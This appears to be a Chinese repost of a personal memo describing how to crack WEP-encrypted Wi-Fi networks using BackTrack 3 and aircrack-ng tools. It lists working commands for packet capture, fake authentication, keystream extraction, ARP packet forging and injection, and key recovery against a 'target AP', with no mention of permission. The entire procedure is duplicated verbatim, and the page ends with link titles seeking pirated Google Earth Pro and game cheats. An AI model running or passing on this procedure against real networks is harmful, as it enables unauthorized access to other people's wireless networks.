晴天翻唱小草:bt3 google 破解 wep
来源:百度文库 编辑:偶看新闻 时间:2024/04/28 00:35:22
今天根据google来的一些资料,成功破解了几个WEP无线网络,由于google来的资料比较杂乱,以下为我破解过程中手写的过程,在此以做备忘。
对于有无Client连接的AP,都使用此过程可破解WEP。
使用BT3从U盘启动,BT3下载地址如下:
[url]http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb[/url]
下载此文件后,将其中文件放到U盘,并确保boot和BT3目录放在U盘根目录,执行boot目录下的bootinst.sh,一路回车后BT3启动盘制作完成。
1、用BT3启动,使用KDE。
2、modprobe -r iwl3945
3、modprobe ipwraw
注:以上两步为是为我的intel 3945ABG网卡加载驱动模块,第一步是卸载原有模块,第二步是加载新模块。
对于在gentoo下没有ipwraw的,可以去下面地址下载:
wget [url]http://homepages.tu-darmstadt.de/~p_larbig/wlan/ipwraw-ng-2.3.4-04022008.tar.bz2[/url]
下载后解压,然后make && make install && make install_ucode后,再加载此模块。
4、先使用Airoscript查看可用的无线网络
不能在命令行下输入,要在菜单中找到Airosocript(在哪忘了,在B开头的菜单,找一会能找到)
5、打开新窗口,输入以下:
airodump-ng --ivs -w outputs -c 6 wifi0
注:outputs是保存的监控的数据文件名, 6是目标AP的Channel, wifi0是你的网卡设备号
6、打开新窗口,输入以下
aireplay-ng -1 0 -e ESSID -a APMAC -h LOCALMAC wifi0
以上ESSID是目标网络的ESSID, APMAC是目标AP的MAC LOCALMAC是本地网卡的MAC,这些都可以从第4步中找
到,或者使用ifconfig、iwconfig、iwlist来查找
7、生成XOR文件用于向目标AP发送攻击包
aireplay-ns -5 -b APMAC -h LOCALMAC wifi0
出现Read packages字样后等待,有时读几百个包就结束,有时读几十万个也不结束,貌似要看人品。。。
结束后出现 Use this packet ?后,输入y,在当前目录生成了.xor扩展保的文件。
8、准备发送攻击包
packetforge-ng -o -a APMAC -h LOCALMAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx.xor -w mrarp
注:上面的-l是L的小写,.xor就是第6步生成的文件。
9、发送攻击包
areplay-ng -2 -r mrarp -x 1024 wifi0
1024是发包间隔,以避免攻击包速度太快将对方AP搞跨。
执行此步后,会发现第4步输入后的窗口中,目标AP的记录中的DATA疯狂的增长,说明攻击成功。
10、当DATA增长至3万左右时,开新窗口,输入以下:
aircrack-ng -n 64 -b APMAC outputs-0.ivs
注:64指的是64位加密,如果是128的则换成128,.ivs是第4步命令时生成的数据文件,一般文件名就是第4步起的名字后加数字后缀。
如果人品好,密码就会以16进制显示出来了!
对于有无Client连接的AP,都使用此过程可破解WEP。
使用BT3从U盘启动,BT3下载地址如下:
[url]http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb[/url]
下载此文件后,将其中文件放到U盘,并确保boot和BT3目录放在U盘根目录,执行boot目录下的bootinst.sh,一路回车后BT3启动盘制作完成。
1、用BT3启动,使用KDE。
2、modprobe -r iwl3945
3、modprobe ipwraw
注:以上两步为是为我的intel 3945ABG网卡加载驱动模块,第一步是卸载原有模块,第二步是加载新模块。
对于在gentoo下没有ipwraw的,可以去下面地址下载:
wget [url]http://homepages.tu-darmstadt.de/~p_larbig/wlan/ipwraw-ng-2.3.4-04022008.tar.bz2[/url]
下载后解压,然后make && make install && make install_ucode后,再加载此模块。
4、先使用Airoscript查看可用的无线网络
不能在命令行下输入,要在菜单中找到Airosocript(在哪忘了,在B开头的菜单,找一会能找到)
5、打开新窗口,输入以下:
airodump-ng --ivs -w outputs -c 6 wifi0
注:outputs是保存的监控的数据文件名, 6是目标AP的Channel, wifi0是你的网卡设备号
6、打开新窗口,输入以下
aireplay-ng -1 0 -e ESSID -a APMAC -h LOCALMAC wifi0
以上ESSID是目标网络的ESSID, APMAC是目标AP的MAC LOCALMAC是本地网卡的MAC,这些都可以从第4步中找
到,或者使用ifconfig、iwconfig、iwlist来查找
7、生成XOR文件用于向目标AP发送攻击包
aireplay-ns -5 -b APMAC -h LOCALMAC wifi0
出现Read packages字样后等待,有时读几百个包就结束,有时读几十万个也不结束,貌似要看人品。。。
结束后出现 Use this packet ?后,输入y,在当前目录生成了.xor扩展保的文件。
8、准备发送攻击包
packetforge-ng -o -a APMAC -h LOCALMAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx.xor -w mrarp
注:上面的-l是L的小写,.xor就是第6步生成的文件。
9、发送攻击包
areplay-ng -2 -r mrarp -x 1024 wifi0
1024是发包间隔,以避免攻击包速度太快将对方AP搞跨。
执行此步后,会发现第4步输入后的窗口中,目标AP的记录中的DATA疯狂的增长,说明攻击成功。
10、当DATA增长至3万左右时,开新窗口,输入以下:
aircrack-ng -n 64 -b APMAC outputs-0.ivs
注:64指的是64位加密,如果是128的则换成128,.ivs是第4步命令时生成的数据文件,一般文件名就是第4步起的名字后加数字后缀。
如果人品好,密码就会以16进制显示出来了!
wep滤镜文件破解密码?
哪款54M无线网卡支持WEP破解
google earth pro破解
GOOGLE EARTH汉化破解版
qq2005 bt3 版本
BT3.2.0怎么用
Google Earth Pro Map (google卫星地图) 破解版
谁有Google Earth Pro 破解版?
关于Google Earth Pro破解版本
求google earth pro 破解注册版
怎么用WEP
什麽是WEP加密
wep站点是什麽意思?
WEP什么意思
劲舞团WEP讨论
wep网络游戏修改器
劲舞团wep下载
怎样下载劲舞WEP?
WEP解压到哪
google earth pro 破解版的服务器地址
哪里有google earth破解中文版本下载的!
现在谁用破解的google pro好用?
Google Earth这个软件能升级和破解吗???
什么是Google Earth的真正注册破解版?